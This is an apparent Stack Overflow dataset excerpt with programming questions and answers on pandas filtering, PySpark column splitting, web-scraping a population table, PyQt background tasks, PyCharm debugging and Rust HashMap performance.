[ "Use DataFrame.query with changed dictionary:\nmasks = {'old_strong' : \"(age >18) & (strength >5)\",\n 'young_weak' : \"(age <18) & (strength <5)\"}\n\nprint (df.query(masks['young_weak']))\n age strength\n0 10 0\n\n", "Another way is to set up the masks as functions (lambda expressions) instead of strings. This works:\nmasks = {'old_strong' : lambda row: (row['age'] >18) & (row['strength'] >5),\n 'young_weak' : lambda row: (row['age'] <18) & (row['strength'] <5)}\ndf[masks['young_weak']]\n\n", "If you're allowed to change the masks dictionary, the easiest way is to store filters and not strings like this:\nmasks = {\n 'old_strong' : (df['age'] >18) & (df['strength'] >5),\n 'young_weak' : (df['age'] <18) & (df['strength'] <5)\n}\n\nOtherwise, keep the strings and use df.query(masks['yound_weak']).\n", "Unsafe solution though, and very bad practice, but the only way to solve it is to use eval:\nprint(df[eval(masks['young_weak'])])\n\nOutput:\n age strength\n0 10 0\n\nHere is the link to the reason it's bad.\n" ]
[ 6, 1, 1, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0056456780_pandas_python.txt
Q: How to select, inside a df, only columns that have numeric values i have multiple columns and want to see inside them what are the null values. then i want to know if columns that have null values are numeric df.isnull().sum() -> gives me the sum of null values inside the df (question 2 - in pandas the result are only the top 5 and last 5 colums; How can i see all columns? ) then from the result given i wanted to get only columns with numeric values A: 1st, you can type 'df.info()' There is about null data and amount of index. If it is small data, you can check like this for i in range(len(df.index)): for j in range(len(df.columns)): if df.isna().iloc[i][j] == True: print(f'index is {i}, column is {df.columns[j]}') but if it is big data, it can be make a problem. if you wanna check this on other dataframe, you can save it. df_null = {'index':[], 'columns':[]} for i in range(len(df.index)): for j in range(len(df.columns)): if df.isna().iloc[i][j] == True: df_null['index'].append(i) df_null['columns'].append(df.columns[j]) dfna = pd.DataFrame(df_null) It's working. but it is so slow. maybe there is more good answer but I know only this way. then, good day! I hope this answer helps you
How to select, inside a df, only columns that have numeric values
i have multiple columns and want to see inside them what are the null values. then i want to know if columns that have null values are numeric df.isnull().sum() -> gives me the sum of null values inside the df (question 2 - in pandas the result are only the top 5 and last 5 colums; How can i see all columns? ) then from the result given i wanted to get only columns with numeric values
[ "1st, you can type 'df.info()'\nThere is about null data and amount of index.\nIf it is small data,\nyou can check like this\nfor i in range(len(df.index)):\n for j in range(len(df.columns)):\n if df.isna().iloc[i][j] == True:\n print(f'index is {i}, column is {df.columns[j]}')\n\nbut if it is big data, it can be make a problem.\nif you wanna check this on other dataframe,\nyou can save it.\ndf_null = {'index':[], 'columns':[]}\nfor i in range(len(df.index)):\n for j in range(len(df.columns)):\n if df.isna().iloc[i][j] == True:\n df_null['index'].append(i)\n df_null['columns'].append(df.columns[j])\n\ndfna = pd.DataFrame(df_null)\n\nIt's working. but it is so slow.\nmaybe there is more good answer but\nI know only this way.\nthen, good day!\nI hope this answer helps you\n" ]
[ 0 ]
[]
[]
[ "data_cleaning", "dataframe", "pandas", "python" ]
stackoverflow_0074576055_data_cleaning_dataframe_pandas_python.txt
Q: How to scrape the table of states? I am trying to scrape the table from: https://worldpopulationreview.com/states My code: from bs4 import BeautifulSoup import requests import pandas as pd url = 'https://worldpopulationreview.com/states' page = requests.get(url) soup = BeautifulSoup(page.text,'lxml') table = soup.find('table', {'class': 'jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow'}) headers = [] for i in table.find_all('th'): title = i.text.strip() headers.append(title) df = pd.DataFrame(columns=headers) for row in table.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text.strip() for td in data] length = len(df) df.loc[length] = row_data df Currently returns 'NoneType' object has no attribute 'find_all' Clearly the error is because the table variable is returning nothing, but I believe I have the table tag correct. A: The table data is dynamically loaded by JavaScript and bs4 can't render JS but you can do the job bs4 with an automation tool something like selenium and grab the table using pandas DataFrame. from selenium import webdriver import time from bs4 import BeautifulSoup import pandas as pd from selenium.webdriver.chrome.service import Service webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://worldpopulationreview.com/states') driver.maximize_window() time.sleep(8) soup = BeautifulSoup(driver.page_source,"lxml") #You can pull the table directly from the web page df = pd.read_html(str(soup))[0] print(df) #OR #table= soup.select_one('table[class="jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow"]') # df = pd.read_html(str(table))[0] # print(df) Output: Rank State 2022 Population Growth Rate ... 2010 Population Growth Since 2010 % of US Density (/mi²) 0 1 California 39995077 0.57% ... 37253956 7.36% 11.93% 257 1 2 Texas 29945493 1.35% ... 25145561 19.09% 8.93% 115 2 3 Florida 22085563 1.25% ... 18801310 17.47% 6.59% 412 3 4 New York 20365879 0.41% ... 19378102 5.10% 6.07% 432 4 5 Pennsylvania 13062764 0.23% ... 12702379 2.84% 3.90% 292 5 6 Illinois 12808884 -0.01% ... 12830632 -0.17% 3.82% 231 6 7 Ohio 11852036 0.22% ... 11536504 2.74% 3.53% 290 7 8 Georgia 10916760 0.95% ... 9687653 12.69% 3.26% 190 8 9 North Carolina 10620168 0.86% ... 9535483 11.38% 3.17% 218 9 10 Michigan 10116069 0.19% ... 9883640 2.35% 3.02% 179 10 11 New Jersey 9388414 0.53% ... 8791894 6.78% 2.80% 1277 11 12 Virginia 8757467 0.73% ... 8001024 9.45% 2.61% 222 12 13 Washington 7901429 1.26% ... 6724540 17.50% 2.36% 119 13 14 Arizona 7303398 1.05% ... 6392017 14.26% 2.18% 64 14 15 Massachusetts 7126375 0.68% ... 6547629 8.84% 2.13% 914 15 16 Tennessee 7023788 0.81% ... 6346105 10.68% 2.09% 170 16 17 Indiana 6845874 0.44% ... 6483802 5.58% 2.04% 191 17 18 Maryland 6257958 0.65% ... 5773552 8.39% 1.87% 645 18 19 Missouri 6188111 0.27% ... 5988927 3.33% 1.85% 90 19 20 Wisconsin 5935064 0.35% ... 5686986 4.36% 1.77% 110 20 21 Colorado 5922618 1.27% ... 5029196 17.76% 1.77% 57 21 22 Minnesota 5787008 0.70% ... 5303925 9.11% 1.73% 73 22 23 South Carolina 5217037 0.95% ... 4625364 12.79% 1.56% 174 23 24 Alabama 5073187 0.48% ... 4779736 6.14% 1.51% 100 24 25 Louisiana 4682633 0.27% ... 4533372 3.29% 1.40% 108 25 26 Kentucky 4539130 0.37% ... 4339367 4.60% 1.35% 115 26 27 Oregon 4318492 0.95% ... 3831074 12.72% 1.29% 45 27 28 Oklahoma 4000953 0.52% ... 3751351 6.65% 1.19% 58 28 29 Connecticut 3612314 0.09% ... 3574097 1.07% 1.08% 746 29 30 Utah 3373162 1.53% ... 2763885 22.04% 1.01% 41 30 31 Iowa 3219171 0.45% ... 3046355 5.67% 0.96% 58 31 32 Nevada 3185426 1.28% ... 2700551 17.95% 0.95% 29 32 33 Arkansas 3030646 0.32% ... 2915918 3.93% 0.90% 58 33 34 Mississippi 2960075 -0.02% ... 2967297 -0.24% 0.88% 63 34 35 Kansas 2954832 0.29% ... 2853118 3.57% 0.88% 36 35 36 New Mexico 2129190 0.27% ... 2059179 3.40% 0.64% 18 36 37 Nebraska 1988536 0.68% ... 1826341 8.88% 0.59% 26 37 38 Idaho 1893410 1.45% ... 1567582 20.79% 0.56% 23 38 39 West Virginia 1781860 -0.33% ... 1852994 -3.84% 0.53% 74 39 40 Hawaii 1474265 0.65% ... 1360301 8.38% 0.44% 230 40 41 New Hampshire 1389741 0.44% ... 1316470 5.57% 0.41% 155 41 42 Maine 1369159 0.25% ... 1328361 3.07% 0.41% 44 42 43 Rhode Island 1106341 0.41% ... 1052567 5.11% 0.33% 1070 43 44 Montana 1103187 0.87% ... 989415 11.50% 0.33% 8 44 45 Delaware 1008350 0.92% ... 897934 12.30% 0.30% 517 45 46 South Dakota 901165 0.81% ... 814180 10.68% 0.27% 12 46 47 North Dakota 800394 1.35% ... 672591 19.00% 0.24% 12 47 48 Alaska 738023 0.31% ... 710231 3.91% 0.22% 1 48 49 Vermont 646545 0.27% ... 625741 3.32% 0.19% 70 49 50 Wyoming 579495 0.23% ... 563626 2.82% 0.17% 6 [50 rows x 9 columns] A: Table is rendered dynamically from JSON that is placed at the end of the source code, so it do not need selenium simply extract the tag and load the JSON - This also includes all additional information from the page: soup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text) json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data'] Example import requests, json import pandas as pd from bs4 import BeautifulSoup soup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text) pd.DataFrame( json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data'] ) Example Cause there are also additional information, that is used for the map, simply choose columns you need by header. fips state densityMi pop2022 pop2021 pop2020 pop2019 pop2010 growthRate growth growthSince2010 area fill Name rank 0 6 California 256.742 39995077 39766650 39538223 39309799 37253956 0.00574419 228427 0.0735793 155779 #084594 California 1 1 48 Texas 114.632 29945493 29545499 29145505 28745507 25145561 0.0135382 399994 0.190886 261232 #084594 Texas 2 2 12 Florida 411.852 22085563 21811875 21538187 21264502 18801310 0.0125477 273688 0.174682 53625 #084594 Florida 3 3 36 New York 432.158 20365879 20283564 20201249 20118937 19378102 0.00405821 82315 0.0509739 47126 #084594 New York 4 4 42 Pennsylvania 291.951 13062764 13032732 13002700 12972667 12702379 0.00230435 30032 0.0283715 44743 #2171b5 Pennsylvania 5 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... 45 46 South Dakota 11.887 901165 893916 886667 879421 814180 0.00810926 7249 0.106838 75811 #c6dbef South Dakota 46 46 38 North Dakota 11.5997 800394 789744 779094 768441 672591 0.0134854 10650 0.190016 69001 #c6dbef North Dakota 47 47 2 Alaska 1.29332 738023 735707 733391 731075 710231 0.00314799 2316 0.0391309 570641 #c6dbef Alaska 48 48 50 Vermont 70.147 646545 644811 643077 641347 625741 0.00268916 1734 0.033247 9217 #c6dbef Vermont 49 49 56 Wyoming 5.96845 579495 578173 576851 575524 563626 0.00228651 1322 0.0281552 97093 #c6dbef Wyoming 50
How to scrape the table of states?
I am trying to scrape the table from: https://worldpopulationreview.com/states My code: from bs4 import BeautifulSoup import requests import pandas as pd url = 'https://worldpopulationreview.com/states' page = requests.get(url) soup = BeautifulSoup(page.text,'lxml') table = soup.find('table', {'class': 'jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow'}) headers = [] for i in table.find_all('th'): title = i.text.strip() headers.append(title) df = pd.DataFrame(columns=headers) for row in table.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text.strip() for td in data] length = len(df) df.loc[length] = row_data df Currently returns 'NoneType' object has no attribute 'find_all' Clearly the error is because the table variable is returning nothing, but I believe I have the table tag correct.
[ "The table data is dynamically loaded by JavaScript and bs4 can't render JS but you can do the job bs4 with an automation tool something like selenium and grab the table using pandas DataFrame.\nfrom selenium import webdriver\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium.webdriver.chrome.service import Service\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://worldpopulationreview.com/states')\ndriver.maximize_window()\ntime.sleep(8)\n\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\n\n\n#You can pull the table directly from the web page\ndf = pd.read_html(str(soup))[0]\nprint(df)\n\n#OR\n#table= soup.select_one('table[class=\"jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow\"]')\n# df = pd.read_html(str(table))[0]\n# print(df)\n\nOutput:\n Rank State 2022 Population Growth Rate ... 2010 Population Growth Since 2010 % of US Density (/mi²)\n0 1 California 39995077 0.57% ... 37253956 7.36% 11.93% 257\n1 2 Texas 29945493 1.35% ... 25145561 19.09% 8.93% 115\n2 3 Florida 22085563 1.25% ... 18801310 17.47% 6.59% 412\n3 4 New York 20365879 0.41% ... 19378102 5.10% 6.07% 432\n4 5 Pennsylvania 13062764 0.23% ... 12702379 2.84% 3.90% 292\n5 6 Illinois 12808884 -0.01% ... 12830632 -0.17% 3.82% 231\n6 7 Ohio 11852036 0.22% ... 11536504 2.74% 3.53% 290\n7 8 Georgia 10916760 0.95% ... 9687653 12.69% 3.26% 190\n8 9 North Carolina 10620168 0.86% ... 9535483 11.38% 3.17% 218\n9 10 Michigan 10116069 0.19% ... 9883640 2.35% 3.02% 179\n10 11 New Jersey 9388414 0.53% ... 8791894 6.78% 2.80% 1277\n11 12 Virginia 8757467 0.73% ... 8001024 9.45% 2.61% 222\n12 13 Washington 7901429 1.26% ... 6724540 17.50% 2.36% 119\n13 14 Arizona 7303398 1.05% ... 6392017 14.26% 2.18% 64\n14 15 Massachusetts 7126375 0.68% ... 6547629 8.84% 2.13% 914\n15 16 Tennessee 7023788 0.81% ... 6346105 10.68% 2.09% 170\n16 17 Indiana 6845874 0.44% ... 6483802 5.58% 2.04% 191\n17 18 Maryland 6257958 0.65% ... 5773552 8.39% 1.87% 645\n18 19 Missouri 6188111 0.27% ... 5988927 3.33% 1.85% 90\n19 20 Wisconsin 5935064 0.35% ... 5686986 4.36% 1.77% 110\n20 21 Colorado 5922618 1.27% ... 5029196 17.76% 1.77% 57\n21 22 Minnesota 5787008 0.70% ... 5303925 9.11% 1.73% 73\n22 23 South Carolina 5217037 0.95% ... 4625364 12.79% 1.56% 174\n23 24 Alabama 5073187 0.48% ... 4779736 6.14% 1.51% 100\n24 25 Louisiana 4682633 0.27% ... 4533372 3.29% 1.40% 108\n25 26 Kentucky 4539130 0.37% ... 4339367 4.60% 1.35% 115\n26 27 Oregon 4318492 0.95% ... 3831074 12.72% 1.29% 45\n27 28 Oklahoma 4000953 0.52% ... 3751351 6.65% 1.19% 58\n28 29 Connecticut 3612314 0.09% ... 3574097 1.07% 1.08% 746\n29 30 Utah 3373162 1.53% ... 2763885 22.04% 1.01% 41\n30 31 Iowa 3219171 0.45% ... 3046355 5.67% 0.96% 58\n31 32 Nevada 3185426 1.28% ... 2700551 17.95% 0.95% 29\n32 33 Arkansas 3030646 0.32% ... 2915918 3.93% 0.90% 58\n33 34 Mississippi 2960075 -0.02% ... 2967297 -0.24% 0.88% 63\n34 35 Kansas 2954832 0.29% ... 2853118 3.57% 0.88% 36\n35 36 New Mexico 2129190 0.27% ... 2059179 3.40% 0.64% 18\n36 37 Nebraska 1988536 0.68% ... 1826341 8.88% 0.59% 26\n37 38 Idaho 1893410 1.45% ... 1567582 20.79% 0.56% 23\n38 39 West Virginia 1781860 -0.33% ... 1852994 -3.84% 0.53% 74\n39 40 Hawaii 1474265 0.65% ... 1360301 8.38% 0.44% 230\n40 41 New Hampshire 1389741 0.44% ... 1316470 5.57% 0.41% 155\n41 42 Maine 1369159 0.25% ... 1328361 3.07% 0.41% 44\n42 43 Rhode Island 1106341 0.41% ... 1052567 5.11% 0.33% 1070\n43 44 Montana 1103187 0.87% ... 989415 11.50% 0.33%\n8\n44 45 Delaware 1008350 0.92% ... 897934 12.30% 0.30% 517\n45 46 South Dakota 901165 0.81% ... 814180 10.68% 0.27% 12\n46 47 North Dakota 800394 1.35% ... 672591 19.00% 0.24% 12\n47 48 Alaska 738023 0.31% ... 710231 3.91% 0.22%\n1\n48 49 Vermont 646545 0.27% ... 625741 3.32% 0.19% 70\n49 50 Wyoming 579495 0.23% ... 563626 2.82% 0.17%\n6\n\n[50 rows x 9 columns]\n\n", "Table is rendered dynamically from JSON that is placed at the end of the source code, so it do not need selenium simply extract the tag and load the JSON - This also includes all additional information from the page:\nsoup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text)\n\njson.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data']\n\nExample\nimport requests, json\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nsoup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text)\n\npd.DataFrame(\n json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data']\n)\n\nExample\nCause there are also additional information, that is used for the map, simply choose columns you need by header.\n\n\n\n\n\nfips\nstate\ndensityMi\npop2022\npop2021\npop2020\npop2019\npop2010\ngrowthRate\ngrowth\ngrowthSince2010\narea\nfill\nName\nrank\n\n\n\n\n0\n6\nCalifornia\n256.742\n39995077\n39766650\n39538223\n39309799\n37253956\n0.00574419\n228427\n0.0735793\n155779\n#084594\nCalifornia\n1\n\n\n1\n48\nTexas\n114.632\n29945493\n29545499\n29145505\n28745507\n25145561\n0.0135382\n399994\n0.190886\n261232\n#084594\nTexas\n2\n\n\n2\n12\nFlorida\n411.852\n22085563\n21811875\n21538187\n21264502\n18801310\n0.0125477\n273688\n0.174682\n53625\n#084594\nFlorida\n3\n\n\n3\n36\nNew York\n432.158\n20365879\n20283564\n20201249\n20118937\n19378102\n0.00405821\n82315\n0.0509739\n47126\n#084594\nNew York\n4\n\n\n4\n42\nPennsylvania\n291.951\n13062764\n13032732\n13002700\n12972667\n12702379\n0.00230435\n30032\n0.0283715\n44743\n#2171b5\nPennsylvania\n5\n\n\n...\n...\n...\n...\n...\n...\n...\n...\n...\n...\n...\n\n...\n...\n...\n...\n\n\n45\n46\nSouth Dakota\n11.887\n901165\n893916\n886667\n879421\n814180\n0.00810926\n7249\n0.106838\n75811\n#c6dbef\nSouth Dakota\n46\n\n\n46\n38\nNorth Dakota\n11.5997\n800394\n789744\n779094\n768441\n672591\n0.0134854\n10650\n0.190016\n69001\n#c6dbef\nNorth Dakota\n47\n\n\n47\n2\nAlaska\n1.29332\n738023\n735707\n733391\n731075\n710231\n0.00314799\n2316\n0.0391309\n570641\n#c6dbef\nAlaska\n48\n\n\n48\n50\nVermont\n70.147\n646545\n644811\n643077\n641347\n625741\n0.00268916\n1734\n0.033247\n9217\n#c6dbef\nVermont\n49\n\n\n49\n56\nWyoming\n5.96845\n579495\n578173\n576851\n575524\n563626\n0.00228651\n1322\n0.0281552\n97093\n#c6dbef\nWyoming\n50\n\n\n\n" ]
[ 3, 2 ]
[]
[]
[ "beautifulsoup", "python", "web_scraping" ]
stackoverflow_0074591839_beautifulsoup_python_web_scraping.txt
Q: Periodic task in Qt without interrupting events I have a graphic application in python using QWidget. The user can change elements by moving the mouse (using mouseMoveEvent), and the program should periodically (e.g., once per second) compute a function update_forces based on these elements. Problem: the mouseMoveEvent doesn't trigger as often while update_forces is computed, so the program becomes periodically unresponsive. There are various tutorials online on how to remedy this using threads, but their solutions don't work for me, and I don't know why. MWE # Imports import sys import random import time from PyQt5.QtCore import QThread, pyqtSignal, QObject from PyQt5.QtWidgets import QWidget, QApplication # update_forces dummy def update_forces(): for i in range(10000000): x = i**2 # Worker object: class Worker(QObject): finished = pyqtSignal() def run(self): while(True): update_forces() time.sleep(1) # and the Window class with a dummy mouseEvent that just prints a random number class Window(QWidget): def __init__(self): super().__init__() self.initUI() self.setMouseTracking(True) def initUI(self): self.setGeometry(20, 20, 500, 500) self.show() self.thread = QThread() self.worker = Worker() self.worker.moveToThread(self.thread) self.thread.started.connect(self.worker.run) self.worker.finished.connect(self.thread.quit) self.worker.finished.connect(self.worker.deleteLater) self.thread.finished.connect(self.thread.deleteLater) self.thread.start() def mouseMoveEvent(self, e): print(random.random()) # head procedure if __name__ == '__main__': app = QApplication(sys.argv) w = Window() w.show() sys.exit(app.exec_()) When I run this (Windows 10) and move my cursor around on the screen, I can clearly observe two phases: it goes from printing numbers rapidly (while update_forces is not computed), to printing them much more slowly (while it is computed). It keeps alternating between both. A: The solution is to use multiprocessing rather than threading. from multiprocessing import Process if __name__ == '__main__': p = Process(target=updater, args=()) p.start() def updater(queue,test): while(True): update_forces() time.sleep(1) The problem with this is that no data is shared between processes by default, but that's solvable.
Periodic task in Qt without interrupting events
I have a graphic application in python using QWidget. The user can change elements by moving the mouse (using mouseMoveEvent), and the program should periodically (e.g., once per second) compute a function update_forces based on these elements. Problem: the mouseMoveEvent doesn't trigger as often while update_forces is computed, so the program becomes periodically unresponsive. There are various tutorials online on how to remedy this using threads, but their solutions don't work for me, and I don't know why. MWE # Imports import sys import random import time from PyQt5.QtCore import QThread, pyqtSignal, QObject from PyQt5.QtWidgets import QWidget, QApplication # update_forces dummy def update_forces(): for i in range(10000000): x = i**2 # Worker object: class Worker(QObject): finished = pyqtSignal() def run(self): while(True): update_forces() time.sleep(1) # and the Window class with a dummy mouseEvent that just prints a random number class Window(QWidget): def __init__(self): super().__init__() self.initUI() self.setMouseTracking(True) def initUI(self): self.setGeometry(20, 20, 500, 500) self.show() self.thread = QThread() self.worker = Worker() self.worker.moveToThread(self.thread) self.thread.started.connect(self.worker.run) self.worker.finished.connect(self.thread.quit) self.worker.finished.connect(self.worker.deleteLater) self.thread.finished.connect(self.thread.deleteLater) self.thread.start() def mouseMoveEvent(self, e): print(random.random()) # head procedure if __name__ == '__main__': app = QApplication(sys.argv) w = Window() w.show() sys.exit(app.exec_()) When I run this (Windows 10) and move my cursor around on the screen, I can clearly observe two phases: it goes from printing numbers rapidly (while update_forces is not computed), to printing them much more slowly (while it is computed). It keeps alternating between both.
[ "The solution is to use multiprocessing rather than threading.\nfrom multiprocessing import Process\nif __name__ == '__main__':\n p = Process(target=updater, args=())\n p.start()\n\ndef updater(queue,test):\n while(True):\n update_forces()\n time.sleep(1)\n\nThe problem with this is that no data is shared between processes by default, but that's solvable.\n" ]
[ 0 ]
[]
[]
[ "pyqt", "python", "qt", "qwidget" ]
stackoverflow_0074590391_pyqt_python_qt_qwidget.txt
Q: PyCharm 2022.1.2 does not hit the debug breakpoint with Django I can't get Python debugger to work on PyCharm 2022.1.2 with Django 4. When I set the breakpoint inside the view function and then call this view in the browser, nothing happens when started in debug mode... breakpoint_selected However breakpoint is hit when I set it for import. breakpoint_hit I have 2 configurations, one for Python and one for Django Server, both don't work. config1 config2 Went through numerous JetBrains tickets with people reporting similar problem but didn't find the solution there. Also tried creating second run configuration, for Python instead Django Server, but this also didn't help. A: Solved this by deleting the .idea directory from top-level django project dir. Not sure what were the mechanics behind it, but it worked and now breakpoints work perfectly.
PyCharm 2022.1.2 does not hit the debug breakpoint with Django
I can't get Python debugger to work on PyCharm 2022.1.2 with Django 4. When I set the breakpoint inside the view function and then call this view in the browser, nothing happens when started in debug mode... breakpoint_selected However breakpoint is hit when I set it for import. breakpoint_hit I have 2 configurations, one for Python and one for Django Server, both don't work. config1 config2 Went through numerous JetBrains tickets with people reporting similar problem but didn't find the solution there. Also tried creating second run configuration, for Python instead Django Server, but this also didn't help.
[ "Solved this by deleting the .idea directory from top-level django project dir. Not sure what were the mechanics behind it, but it worked and now breakpoints work perfectly.\n" ]
[ 0 ]
[]
[]
[ "breakpoints", "debugging", "django", "pycharm", "python" ]
stackoverflow_0074582147_breakpoints_debugging_django_pycharm_python.txt
Q: How to use pyspark to convert row array into multiple columns? I've raw data like this: Column A Column B "A:1, B:2, C:3" XXX The result I want is like this: Column A A B C Column B "A:1, B:2, C:3" 1 2 3 XXX Can anyone help with pyspark code? A: df =spark.createDataFrame([ (78,'"A:1, B:2, C:3"'), ], ('id', 'ColumnA')) Replace the " with nothing. Split the resulting string with , and this will give you a list. Iterate the list elements converting them to lists by splitting with : and make all those lists of StructType. Explode the list. group by columnA and pivot. Code below df.withColumn('ColumnA', split(translate(col('ColumnA'),'"',''),',')).withColumn('ColumnA_edited', explode(transform('ColumnA', lambda x: struct(*[split(x,':')[i].alias(f'x{i+1}') for i in range(2)])))).select( 'ColumnA','ColumnA_edited.*').groupby('ColumnA').pivot('x1').agg(first('x2')).show() +-----------------+---+---+---+ | ColumnA| B| C| A| +-----------------+---+---+---+ |[A:1, B:2, C:3]| 2| 3| 1| +-----------------+---+---+---+ A: This is a solution possible thanks to the fixed amount of columns: import pyspark.sql.functions as F # create an array column from string df = df.withColumn('array', F.split('Column A', ', ')) # create a list with the new column names and the expressions to calculate them new_cols = [F.regexp_replace(df.array[i], c+':', '').alias(c) for i, c in zip([0, 1, 2], ['A', 'B', 'C'])] # select the chosen columns df.select('Column A', *new_cols, 'Column B').show() +-------------+---+---+---+--------+ | Column A| A| B| C|Column B| +-------------+---+---+---+--------+ |A:1, B:2, C:3| 1| 2| 3| XXX| +-------------+---+---+---+--------+
How to use pyspark to convert row array into multiple columns?
I've raw data like this: Column A Column B "A:1, B:2, C:3" XXX The result I want is like this: Column A A B C Column B "A:1, B:2, C:3" 1 2 3 XXX Can anyone help with pyspark code?
[ "df =spark.createDataFrame([\n(78,'\"A:1, B:2, C:3\"'),\n],\n('id', 'ColumnA'))\n\nReplace the \" with nothing. Split the resulting string with , and this will give you a list. Iterate the list elements converting them to lists by splitting with : and make all those lists of StructType. Explode the list. group by columnA and pivot. Code below\ndf.withColumn('ColumnA', split(translate(col('ColumnA'),'\"',''),',')).withColumn('ColumnA_edited', explode(transform('ColumnA', lambda x: struct(*[split(x,':')[i].alias(f'x{i+1}') for i in range(2)])))).select( 'ColumnA','ColumnA_edited.*').groupby('ColumnA').pivot('x1').agg(first('x2')).show()\n\n\n+-----------------+---+---+---+\n| ColumnA| B| C| A|\n+-----------------+---+---+---+\n|[A:1, B:2, C:3]| 2| 3| 1|\n+-----------------+---+---+---+\n\n", "This is a solution possible thanks to the fixed amount of columns:\nimport pyspark.sql.functions as F\n\n# create an array column from string\ndf = df.withColumn('array', F.split('Column A', ', '))\n\n# create a list with the new column names and the expressions to calculate them\nnew_cols = [F.regexp_replace(df.array[i], c+':', '').alias(c) for i, c in zip([0, 1, 2], ['A', 'B', 'C'])]\n\n# select the chosen columns\ndf.select('Column A', *new_cols, 'Column B').show()\n\n+-------------+---+---+---+--------+\n| Column A| A| B| C|Column B|\n+-------------+---+---+---+--------+\n|A:1, B:2, C:3| 1| 2| 3| XXX|\n+-------------+---+---+---+--------+\n\n" ]
[ 0, 0 ]
[]
[]
[ "apache_spark_sql", "dataframe", "pyspark", "python" ]
stackoverflow_0074543049_apache_spark_sql_dataframe_pyspark_python.txt
Q: How to create a dataframe from a list of lists? I need to create a dataframe from a list which contains 10 stocks data in a list.. but the required format is all items should be listed in one column instead of each column for each element. The required format should look like this image below, I tried this (the entire code), import openpyxl import pandas as pd xl = openpyxl.load_workbook("Stock_sample.xlsx") sheet1 = xl["Close Price"] all_cols = sheet1.iter_cols(min_col=2, max_col=10, values_only = True) all_cols_list = [] for cols in all_cols: all_cols_list.append(cols) df = pd.DataFrame (all_cols_list) print (df) the all_cols_list returns a list of list. When I create a df from that list, that returned a dataframe like this below, So, don't know how to do so. please suggest a way to do the required format A: Each list inside the list will be a new column. If you convert these lists into a single list, you can get the output you want. You can use: df=pd.DataFrame([i for sublist in all_cols_list for i in sublist])
How to create a dataframe from a list of lists?
I need to create a dataframe from a list which contains 10 stocks data in a list.. but the required format is all items should be listed in one column instead of each column for each element. The required format should look like this image below, I tried this (the entire code), import openpyxl import pandas as pd xl = openpyxl.load_workbook("Stock_sample.xlsx") sheet1 = xl["Close Price"] all_cols = sheet1.iter_cols(min_col=2, max_col=10, values_only = True) all_cols_list = [] for cols in all_cols: all_cols_list.append(cols) df = pd.DataFrame (all_cols_list) print (df) the all_cols_list returns a list of list. When I create a df from that list, that returned a dataframe like this below, So, don't know how to do so. please suggest a way to do the required format
[ "Each list inside the list will be a new column. If you convert these lists into a single list, you can get the output you want. You can use:\ndf=pd.DataFrame([i for sublist in all_cols_list for i in sublist])\n\n" ]
[ 1 ]
[]
[]
[ "openpyxl", "pandas", "python", "python_3.x" ]
stackoverflow_0074592291_openpyxl_pandas_python_python_3.x.txt
Q: Why Rust HashMap is slower than Python dict? I wrote scripts performing the same computations with dict and hashmap in Rust and in Python. Somehow the Python version is more than 10x faster. How is that happens? Rust script: ` use std::collections::HashMap; use std::time::Instant; fn main() { let now = Instant::now(); let mut h = HashMap::new(); for i in 0..1000000 { h.insert(i, i); } let elapsed = now.elapsed(); println!("Elapsed: {:.2?}", elapsed); } Output: Elapsed: 828.73ms Python script: import time start = time.time() d = dict() for i in range(1000000): d[i] = i print(f"Elapsed: {(time.time() - start) * 1000:.2f}ms") Output: Elapsed: 64.93ms The same is for string keys. I searched for different workarounds about different hashers for HashMap but none of them is giving more than 10x speed up A: Rust by default doesn't have optimizations enabled, because it's annoying for debugging. That makes it, in debug mode, slower than Python. Enabling optimizations should fix that problem. This behaviour is not specific to Rust, it's the default for most compilers (like gcc/g++ or clang for C/C++, both require the -O3 flag for maximum performance). You can enable optimizations in Rust by adding the --release flag to the respective cargo commands, like: cargo run --release Python doesn't distinguish between with or without optimizations, because Python is an interpreted language and doesn't have an (explicit) compilation step. This is the behavior of your code on my machine: Python: ~180ms Rust: ~1750 ms Rust (with --release): ~160ms Python's dict implementation is most likely written in C and heavily optimized, so it should be similar in performance to Rust's HashMap, which is exactly what I see on my machine.
Why Rust HashMap is slower than Python dict?
I wrote scripts performing the same computations with dict and hashmap in Rust and in Python. Somehow the Python version is more than 10x faster. How is that happens? Rust script: ` use std::collections::HashMap; use std::time::Instant; fn main() { let now = Instant::now(); let mut h = HashMap::new(); for i in 0..1000000 { h.insert(i, i); } let elapsed = now.elapsed(); println!("Elapsed: {:.2?}", elapsed); } Output: Elapsed: 828.73ms Python script: import time start = time.time() d = dict() for i in range(1000000): d[i] = i print(f"Elapsed: {(time.time() - start) * 1000:.2f}ms") Output: Elapsed: 64.93ms The same is for string keys. I searched for different workarounds about different hashers for HashMap but none of them is giving more than 10x speed up
